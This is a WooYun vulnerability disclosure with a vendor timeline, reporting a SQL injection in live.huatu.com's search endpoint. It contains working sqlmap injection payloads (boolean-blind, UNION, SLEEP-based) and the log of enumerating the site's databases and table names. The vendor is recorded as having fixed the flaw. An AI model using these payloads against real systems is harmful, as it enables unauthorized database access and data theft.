2016-07-04: Details reported to the vendor, awaiting vendor handling
2016-07-05: Vendor has confirmed; details disclosed to the vendor only
2016-07-05: Vendor has fixed the vulnerability and proactively disclosed it; details made public
As titled.
http://wooyun.org/bugs/wooyun-2016-0222995
Picking up where the previous expert's report left off.
Injection point: http://live.huatu.com/Search/index/fx/index
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://live.huatu.com:80/Search/index/fx/index') AND 9438=9438 AND('XXvg'='XXvg

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://live.huatu.com:80/Search/index/fx/index') LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a64646a3a,0x6f6a6f57457a6b4a4142,0x3a796e783a), NULL, NULL--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://live.huatu.com:80/Search/index/fx/index') AND SLEEP(5) AND ('ayvC'='ayvC
---
[16:37:02] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[16:37:02] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 1 times
[16:37:02] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[16:37:02] [INFO] fetched data logged to text files under 'C:\DOCUME~1\xiaolu\??\SQLMAP~1\SQLMAP~1\Bin\output\live.huatu.com'

[16:37:11] [INFO] fetching database names
[16:37:11] [INFO] the SQL query used returns 3 entries
[16:37:11] [INFO] retrieved: "information_schema"
[16:37:12] [INFO] retrieved: "live"
[16:37:12] [INFO] retrieved: "test"
available databases [3]:
[*] information_schema
[*] live
[*] test

[16:37:52] [INFO] fetching tables for database: 'live'
[16:37:52] [INFO] the SQL query used returns 27 entries
[16:37:52] [INFO] retrieved: "admin"
[16:37:52] [INFO] retrieved: "dede_addoncrm"
[16:37:53] [INFO] retrieved: "dede_live_shengcheng"
[16:37:53] [INFO] retrieved: "fenxiao"
[16:37:53] [INFO] retrieved: "fufei"
[16:37:53] [INFO] retrieved: "live_tongbu"
[16:37:53] [INFO] retrieved: "livepl"
[16:37:53] [INFO] retrieved: "new_teacher"
[16:37:54] [INFO] retrieved: "new_tv"
[16:37:54] [INFO] retrieved: "session"
[16:37:54] [INFO] retrieved: "testbiao"
[16:37:54] [INFO] retrieved: "tv_ads"
[16:37:54] [INFO] retrieved: "tv_blacklist"
[16:37:54] [INFO] retrieved: "tv_category"
[16:37:55] [INFO] retrieved: "tv_dianzan"
[16:37:55] [INFO] retrieved: "tv_flowers"
[16:37:55] [INFO] retrieved: "tv_fufei"
[16:37:55] [INFO] retrieved: "tv_jilu"
[16:37:55] [INFO] retrieved: "tv_live_accept"
[16:37:56] [INFO] retrieved: "tv_member"
[16:37:56] [INFO] retrieved: "tv_sc"
[16:37:56] [INFO] retrieved: "tv_yuyue"
[16:37:56] [INFO] retrieved: "v1"
[16:37:56] [INFO] retrieved: "wb_fenxiao"
[16:37:56] [INFO] retrieved: "wb_tv"
[16:37:57] [INFO] retrieved: "wb_tv_view"
[16:37:57] [INFO] retrieved: "web_teacher"
Database: live
[27 tables]
+----------------------+
| admin                |
| dede_addoncrm        |
| dede_live_shengcheng |
| fenxiao              |
| fufei                |
| live_tongbu          |
| livepl               |
| new_teacher          |
| new_tv               |
| session              |
| testbiao             |
| tv_ads               |
| tv_blacklist         |
| tv_category          |
| tv_dianzan           |
| tv_flowers           |
| tv_fufei             |
| tv_jilu              |
| tv_live_accept       |
| tv_member            |
| tv_sc                |
| tv_yuyue             |
| v1                   |
| wb_fenxiao           |
| wb_tv                |
| wb_tv_view           |
| web_teacher          |
+----------------------+
Severity: Medium
Vulnerability Rank: 7
Confirmed: 2016-07-05 17:34
2016-07-05: Filtering has been added.